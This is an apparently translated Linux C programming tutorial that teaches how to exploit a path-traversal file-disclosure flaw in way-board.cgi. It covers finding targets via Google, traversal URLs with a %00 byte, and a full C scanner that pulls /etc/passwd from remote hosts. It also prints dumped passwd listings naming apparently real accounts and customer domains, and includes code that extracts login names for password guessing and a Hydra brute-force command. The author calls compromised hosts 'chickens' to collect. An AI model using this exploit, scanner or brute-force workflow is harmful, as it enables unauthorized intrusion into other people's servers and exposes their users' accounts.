Linux C Programming (Part 4): A Way-Board.cgi Vulnerability Scanner
I. The idea

I was playing with way-board.cgi the day before yesterday, and it works very well. The vulnerability: way-board.cgi discloses system files. Using it you can easily read the target host's passwd and any other file the web server has permission to read.

Manual exploitation, method 1: search www.google.com for the keyword "way-board.cgi" and you will get a lot of URLs of the form:

http://targetip/way-board/way-board.cgi?db=market

Open another browser window and enter the modified URL below. The "../" sequences walk up to the filesystem root, and the trailing %00 is a URL-encoded NUL byte, which makes the script stop reading the file name there so that anything it appends to the name is cut off:

http://targetip/way-board/way-board.cgi?db=../../../../../../etc/passwd%00
You will then see the target host's passwd in the browser. The script prints the file twice, with some garbage mixed in; cleaned up, the result is:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/www/ftp:
anonymous:x:15:50:FTP User:/www/ftp:
nobody:x:99:99:Nobody:/:
mishka:x:499:100:Skyport DNS Service:/home/mishka:/bin/bash
nak:x:500:100::/home/nak:/bin/bash
rbo:x:501:100::/home/rbo:/bin/bash
chiliasp:x:504:100:Chili!ASP Database User:/home/chiliasp:/dev/null
listserv:x:505:100::/home/listserv:/bin/bash
steve:x:506:506::/home/steve:/bin/bash
bdsmark:x:509:501:bdsmark@bdsmark.com:/home/bdsmark:/bin/bash
bd-dollz:x:510:502:bd-dollz@bd-dollz.com:/home/bd-dollz:/bin/bash
suchislifeusa:x:511:503:suchislifeusa@suchislifeusa.net:/home/suchislifeusa:/bin/bash
memphispoetry:x:512:504:memphispoetry@memphispoetry.com:/home/memphispoetry:/bin/bash
eagleridgestore:x:514:507:eagleridgestore@eagleridgestore.com:/home/eagleridgestore:/bin/bash
.........
hkschule:x:990:200:hnschule@eurokorean.com:/www/htdocs/eurokorean/hkschule:/etc/ftponly
sweden:x:991:200:sweden@eurokorean.com:/www/htdocs/eurokorean/sweden:/etc/ftponly
heidelberg:x:992:200:heidelberg@eurokorean.com:/www/htdocs/eurokorean/heidelberg:/etc/ftponly
finkorea:x:993:200:finkorea@eurokorean.com:/www/htdocs/eurokorean/finkorea:/etc/ftponly

Copy it out and use the decomposition program I wrote to split out the user names.

It is then easy to get an ordinary user on the host by remotely guessing telnet or FTP passwords. If you look carefully you will find that the list of users obtained this way is actually very messy and troublesome to process!
Manual exploitation, method 2: under Linux, run

$ telnet targetip 80

and type the request below, followed by an empty line:

GET /way-board/way-board.cgi?db=../../../../../../../../../../etc/passwd%00

The result:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
.........
pcap:x:77:77::/var/arpwatch:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
shoparound:x:1069:1069:www.wavy10.com:/home/cust1/usr1071/html/shoparound:/bin/bash
derekw:x:1069:1069:www.wavy10.com:/home/cust1/usr1071/html/derekwing:/bin/bash
usr1119:x:1143:1144:www.opuscaffe.com:/home/cust1/usr1119:/bin/bash
giordano:x:1143:1144:www.opuscaffe.com:/home/cust1/usr1119:/bin/bash
usr1120:x:1144:1145:www.freeware995.com:/home/cust1/usr1120:/bin/bash
usr1121:x:1145:1146:www.ladyalejandra.com:/home/cust1/usr1121:/bin/bash

This result is better than what you copy out of the browser. You can use my decomposition program to separate the users, but there is a problem: users repeat, and there are useless users. If you look at the output you will see that the passwd file appears twice, so the users obtained are duplicated. This has no effect on password guessing, so when I wrote the program I did not check for repeated users; it only removes the impossible users.
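The article refers to a "decomposition program" but does not show it. The following is an added example of my own (not the author's program) that does the job described above: it parses the passwd text that way-board.cgi returns, keeps only the accounts whose shell allows a login, and, unlike the author's version, also drops the duplicates caused by the file being printed twice. The sample passwd text is constructed for the example, the function names are my own, and treating an empty shell field as a login shell follows passwd(5), which says the default in that case is /bin/sh.

```c
#include <stdio.h>
#include <string.h>

#define MAX_USERS 256
#define NAME_LEN  64

/* Constructed sample of what the CGI returns: a passwd file printed twice,
   with a mix of login accounts and service accounts (not real data). */
static const char SAMPLE_DUMP[] =
    "root:x:0:0:root:/root:/bin/bash\n"
    "bin:x:1:1:bin:/bin:/sbin/nologin\n"
    "sync:x:5:0:sync:/sbin:/bin/sync\n"
    "nobody:x:99:99:Nobody:/:\n"
    "chiliasp:x:504:100:Chili!ASP Database User:/home/chiliasp:/dev/null\n"
    "steve:x:506:506::/home/steve:/bin/bash\n"
    "hkschule:x:990:200:hkschule@example.com:/www/htdocs/hkschule:/etc/ftponly\n"
    "root:x:0:0:root:/root:/bin/bash\n"
    "steve:x:506:506::/home/steve:/bin/bash\n";

/* 1 if the shell field allows an interactive login. An empty field means
   /bin/sh according to passwd(5); otherwise require a name ending in "sh"
   (bash, sh, ksh, csh, zsh...), which rejects /sbin/nologin, /bin/false,
   /dev/null, /etc/ftponly, /bin/sync, /sbin/halt and /sbin/shutdown. */
int login_shell(const char *shell)
{
    size_t n;
    if (shell == NULL || *shell == '\0') return 1;
    n = strlen(shell);
    return n >= 2 && strcmp(shell + n - 2, "sh") == 0;
}

/* Parse passwd-format text line by line, keep the names of accounts with a
   login shell, skip duplicates. Lines without the seven fields of passwd(5)
   (HTML, blank lines, garbage) are ignored. Returns the number of names. */
int extract_users(const char *dump, char out[][NAME_LEN], int max)
{
    int count = 0;
    const char *line = dump;

    while (*line != '\0' && count < max) {
        const char *end = strchr(line, '\n');
        size_t len = end ? (size_t)(end - line) : strlen(line);
        char buf[512], *fields[7], *p;
        int nf = 0, i, dup = 0;

        if (len > 0 && line[len - 1] == '\r') len--;      /* tolerate CRLF */
        if (len == 0 || len >= sizeof(buf)) goto next;
        memcpy(buf, line, len);
        buf[len] = '\0';

        /* split on ':' into exactly seven fields; the shell is the last one */
        p = buf;
        fields[nf++] = p;
        while (nf < 7 && (p = strchr(p, ':')) != NULL) {
            *p++ = '\0';
            fields[nf++] = p;
        }
        if (nf != 7 || fields[0][0] == '\0' || !login_shell(fields[6])) goto next;

        for (i = 0; i < count; i++)
            if (strcmp(out[i], fields[0]) == 0) { dup = 1; break; }
        if (!dup) {
            strncpy(out[count], fields[0], NAME_LEN - 1);
            out[count][NAME_LEN - 1] = '\0';
            count++;
        }
next:
        if (end == NULL) break;
        line = end + 1;
    }
    return count;
}

/* Small wrappers that run the parser on a text and return one value. */
int count_users(const char *dump)
{
    char users[MAX_USERS][NAME_LEN];
    return extract_users(dump, users, MAX_USERS);
}

const char *nth_user(const char *dump, int i)
{
    static char users[MAX_USERS][NAME_LEN];
    int n = extract_users(dump, users, MAX_USERS);
    return (i >= 0 && i < n) ? users[i] : "";
}

int main(void)
{
    char users[MAX_USERS][NAME_LEN];
    int n = extract_users(SAMPLE_DUMP, users, MAX_USERS), i;

    /* one name per line: the list format a password guesser expects */
    for (i = 0; i < n; i++)
        puts(users[i]);
    return 0;
}
```

Run it on the saved output of the scanner (or on a copy from the browser) and redirect stdout to a file to get a user list with one name per line. The "ends in sh" rule is deliberately simple; on a host with an unusual shell in /etc/shells you would extend login_shell() rather than loosen it.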
II. Function description

This program also uses socket programming, which I introduced briefly in my third article. A quick review:

1. Socket types: SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, SOCK_SEQPACKET, SOCK_RDM

2. Socket address structures: sockaddr_in, sockaddr, in_addr

3. The flow of a TCP socket:

    Server                                    Client

    socket()
       |
    bind()
       |
    listen()                                  socket()
       |                                         |
    accept()  <------ connection ------------ connect()
       |                                         |
    recv()    <------ data request ----------- send()
       |                                         |
    send()    ------- data response ---------> recv()
       |                                         |
    recv()    <------ end connection --------- close()
       |
    close()
The following introduces several important functions in more detail:

1. socket()
1.1 Prototype:
    #include <sys/types.h>
    #include <sys/socket.h>
    int socket(int domain, int type, int protocol);
1.2 Description: domain is the protocol family, AF_INET for IPv4. type is the communication type: SOCK_STREAM (stream socket), SOCK_DGRAM (datagram socket) or SOCK_RAW (raw socket). protocol selects the protocol; 0 lets the system choose the default for the given type.
1.3 Return value: a non-negative socket descriptor on success, -1 on failure. Note that 0 is a valid descriptor, so test for a result less than 0, not for zero.

2. connect()
2.1 Prototype:
    #include <sys/types.h>
    #include <sys/socket.h>
    int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
2.2 Description: connects the socket sockfd to the address in addr; for AF_INET this is a struct sockaddr_in cast to struct sockaddr *, with addrlen = sizeof(struct sockaddr_in). Returns 0 on success, -1 on failure.

3. send()
3.1 Prototype:
    #include <sys/types.h>
    #include <sys/socket.h>
    ssize_t send(int sockfd, const void *buf, size_t len, int flags);
3.2 Description: sends len bytes from buf on a connected socket; flags is normally 0. Returns the number of bytes actually sent, which may be less than len, or -1 on failure.

4. recv()
4.1 Prototype:
    #include <sys/types.h>
    #include <sys/socket.h>
    ssize_t recv(int sockfd, void *buf, size_t len, int flags);
4.2 Description: receives up to len bytes into buf. Returns the number of bytes received, 0 when the other side has closed the connection, or -1 on failure. The received data is not NUL-terminated, so always use the returned count.

5. gethostbyname()
5.1 Prototype:
    #include <netdb.h>
    struct hostent *gethostbyname(const char *name);
5.2 Description: resolves a host name (domain name) to its IP addresses and returns a pointer to a struct hostent (see 7 below). Returns NULL on failure and sets h_errno.

6. sockaddr_in structure
6.1 Structure: sockaddr_in is defined in netinet/in.h:
    struct sockaddr_in {
        short int          sin_family;   /* address family */
        unsigned short int sin_port;     /* port number */
        struct in_addr     sin_addr;     /* network address */
        unsigned char      sin_zero[8];  /* padding to the size of struct sockaddr */
    };
6.2 Description: use the sockaddr_in structure to set or obtain address information. sin_family is the address family and can only be AF_INET. sin_port holds the port number in network byte order. sin_addr holds the IP address using
    struct in_addr {
        in_addr_t s_addr;   /* 32-bit address; older texts show it as unsigned long */
    };
This one-member structure is kept for historical reasons. s_addr holds the IP address in network byte order. sin_zero is padding so that sockaddr_in has the same size as sockaddr; it should be zeroed.
6.3 Example:
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_port = htons(3490);                        /* short, network byte order */
    sa.sin_addr.s_addr = inet_addr("132.241.5.10");
    bzero(&(sa.sin_zero), 8);
Note: if sa.sin_addr.s_addr = INADDR_ANY, bind() will accept connections on any local IP address.

7. hostent structure
7.1 Structure: this data structure is defined as follows:
    struct hostent {
        char  *h_name;        /* official name of the host */
        char **h_aliases;     /* host aliases */
        int    h_addrtype;    /* address type, normally AF_INET */
        int    h_length;      /* length of an address in bytes */
        char **h_addr_list;   /* host network addresses, network byte order */
    };
    #define h_addr h_addr_list[0]   /* the first address, kept for backward compatibility */
These are the foundations of socket programming; the more you read and practise, the better.
III. Programming

Under Linux, create the file

nightcat@nightcat$ vi wayboard.c

and enter the following:

/* The Wayboard Scanner, version 1.0
 *
 * One simple way to collect Linux "chickens" is to search for the CGI
 * script way-board.cgi and use my small tool to get the passwd.txt.
 *
 * To compile:
 *   user$ gcc -o wayboard wayboard.c
 *
 * To use:
 *   user$ ./wayboard somedomain.com directory   (i.e. ./wayboard antionline.com ...)
 *
 * Coded by nightcat
 * March 2004
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int s;                      /* socket descriptor */
    int n;                      /* bytes returned by recv() */
    struct sockaddr_in victem;  /* target address */
    struct hostent *bad;        /* result of the name lookup */
    char buffer[1024];          /* receive buffer */
    FILE *fp;                   /* output file */
    char cgihole[300];          /* the HTTP request to send */

    if (argc != 3) {
        printf("\nUsage: %s domain.com directory\n", argv[0]);   /*** Note 1 ***/
        exit(1);
    }
    /* Build a minimal HTTP/1.0 request for the path given on the command line;
       snprintf() so that a long path cannot overflow cgihole. */
    snprintf(cgihole, sizeof(cgihole), "GET %s HTTP/1.0\r\n\r\n", argv[2]);
    printf("%s", cgihole);

    if ((bad = gethostbyname(argv[1])) == NULL) {
        printf("Error getting hostname\n");
        exit(1);
    }
    printf("Check the hole\n");
    printf("Coded by nightcat\n");
    sleep(2);

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        printf("Socket error\n");
        exit(1);
    }
    memset(&victem, 0, sizeof(victem));
    memcpy(&victem.sin_addr, bad->h_addr, bad->h_length);   /* first address from the lookup */
    victem.sin_family = AF_INET;
    victem.sin_port = htons(80);
    if (connect(s, (struct sockaddr *)&victem, sizeof(victem)) < 0) {
        printf("Connect error\n");
        exit(1);
    }

    printf("\nGetting host's passwd.txt\n\n");
    if ((fp = fopen("getpasswd.txt", "w")) == NULL) {
        printf("Can't open file\n");
        exit(1);
    }
    /* send only the request text, not the whole 300-byte array */
    send(s, cgihole, strlen(cgihole), 0);
    /* recv() returns the number of bytes received, 0 when the server closes the
       connection and -1 on error; keep reading while data arrives and write
       exactly that many bytes (the buffer is not NUL-terminated) */
    while ((n = recv(s, buffer, sizeof(buffer), 0)) > 0) {   /*** Note 2 ***/
        fwrite(buffer, 1, n, fp);
    }
    fclose(fp);
    close(s);
    return 0;
}
Save and exit with :wq, then compile and run:

$ gcc -o wayboard wayboard.c
$ ./wayboard targetip "/way-board/way-board.cgi?db=../../../../../../etc/passwd%00"

This gets the same passwd listing as manual method 2, written to getpasswd.txt. The query string contains '?', so quote it to keep the shell from treating it as a wildcard.
You can then get an ordinary user on the host with a password-cracking tool. I like to use Hydra:

$ ./hydra -f /root/passwd.txt targetip telnet

Read its documentation for the details! You can also crack other services: FTP, VNC, SMTP and so on.

IV. Notes

Note 1: this is the format of the input. In fact the program can be used for other "show file" class vulnerabilities as well; I will introduce another show-file vulnerability in a later article.

Note 2: the while loop is what receives all of the returned data. It took me a good while to understand this: as long as recv() returns more than zero bytes, keep writing them to the file, until everything has been received.
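As an added example (not part of the original article or of the nightcat tool), here is how a practitioner would handle the response more carefully than the loop in Note 2: read until the server closes the connection while tolerating short reads and EINTR, separate the HTTP status line and headers from the body, and check that the body actually contains passwd entries rather than an error page or a "not found" message. It also exercises the recv()/read() return-value semantics described in section II (a positive count, 0 at end of connection, -1 on error). The two replies are constructed samples, not captured from any server, a pipe stands in for the socket so the code runs offline, and all function names are my own.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Constructed sample replies (not captured from a real server): a successful
   traversal with the file wrapped in a little HTML, and an error page. */
static const char SAMPLE_OK[] =
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<pre>\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\n</pre>\n";
static const char SAMPLE_404[] = "HTTP/1.0 404 Not Found\r\n\r\n<html>not found</html>\n";

/* Read from fd until the peer closes (read() returns 0) or buf is full,
   accumulating short reads and retrying on EINTR. Returns bytes stored or -1. */
ssize_t read_all(int fd, char *buf, size_t cap)
{
    size_t got = 0;
    while (got < cap) {
        ssize_t n = read(fd, buf + got, cap - got);
        if (n == 0) break;                                   /* end of response */
        if (n < 0) { if (errno == EINTR) continue; return -1; }
        got += (size_t)n;
    }
    return (ssize_t)got;
}

/* Return the status code of "HTTP/1.x NNN ..." (-1 if not an HTTP reply) and
   point *body at the payload after the first blank line (CRLF CRLF or LF LF).
   resp is a byte buffer, not necessarily NUL-terminated. */
int split_response(const char *resp, size_t len, const char **body, size_t *body_len)
{
    size_t i, hdr_end = len;
    *body = resp + len; *body_len = 0;
    if (len < 12 || strncmp(resp, "HTTP/1.", 7) != 0 || resp[8] != ' ' ||
        !isdigit((unsigned char)resp[9]) || !isdigit((unsigned char)resp[10]) ||
        !isdigit((unsigned char)resp[11]))
        return -1;
    for (i = 0; i < len; i++) {
        if (resp[i] != '\n') continue;
        if (i + 1 < len && resp[i + 1] == '\n') { hdr_end = i + 2; break; }
        if (i + 2 < len && resp[i + 1] == '\r' && resp[i + 2] == '\n') { hdr_end = i + 3; break; }
    }
    *body = resp + hdr_end; *body_len = len - hdr_end;
    return (resp[9] - '0') * 100 + (resp[10] - '0') * 10 + (resp[11] - '0');
}

/* 1 if some line of the body starts with "root:" and has the six ':' of a
   passwd(5) entry, so HTML wrapped around the file does not matter. */
int looks_like_passwd(const char *body, size_t len)
{
    size_t i = 0, j;
    while (i < len) {
        int colons = 0;
        for (j = i; j < len && body[j] != '\n'; j++) colons += (body[j] == ':');
        if (j - i >= 5 && strncmp(body + i, "root:", 5) == 0 && colons >= 6) return 1;
        i = j + 1;
    }
    return 0;
}

/* Push a canned reply through a pipe and treat the read end like the scanner's
   socket: read_all(), split, inspect. Returns the status code and sets *passwd
   to 1 only when a 200 reply really carries passwd entries. */
int check_reply(const char *reply, int *passwd)
{
    int fds[2], status;
    char buf[4096];
    ssize_t n;
    const char *body;
    size_t blen;

    *passwd = 0;
    if (pipe(fds) < 0) return -1;
    if (write(fds[1], reply, strlen(reply)) < 0) { close(fds[0]); close(fds[1]); return -1; }
    close(fds[1]);                       /* reader sees EOF once the data is consumed */
    n = read_all(fds[0], buf, sizeof(buf));
    close(fds[0]);
    if (n < 0) return -1;
    status = split_response(buf, (size_t)n, &body, &blen);
    if (status == 200) *passwd = looks_like_passwd(body, blen);
    return status;
}

/* Single-value wrappers around check_reply(). */
int reply_status(const char *reply) { int p; return check_reply(reply, &p); }
int reply_has_passwd(const char *reply) { int p; check_reply(reply, &p); return p; }

int main(void)
{
    int p, s = check_reply(SAMPLE_OK, &p);
    printf("sample 1: status %d, passwd entries: %s\n", s, p ? "yes" : "no");
    s = check_reply(SAMPLE_404, &p);
    printf("sample 2: status %d, passwd entries: %s\n", s, p ? "yes" : "no");
    return 0;
}
```

In the real scanner you would call read_all() on the connected socket instead of the pipe, and write only the body (not the headers) to getpasswd.txt when looks_like_passwd() says yes; a 200 reply that fails that check usually means the script ignored the traversal and returned its normal page.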
V. Contact me

Nickname: nightcat
E-mail: ncnynl@hotmail.com
QQ: 1043931
ICQ: 153436005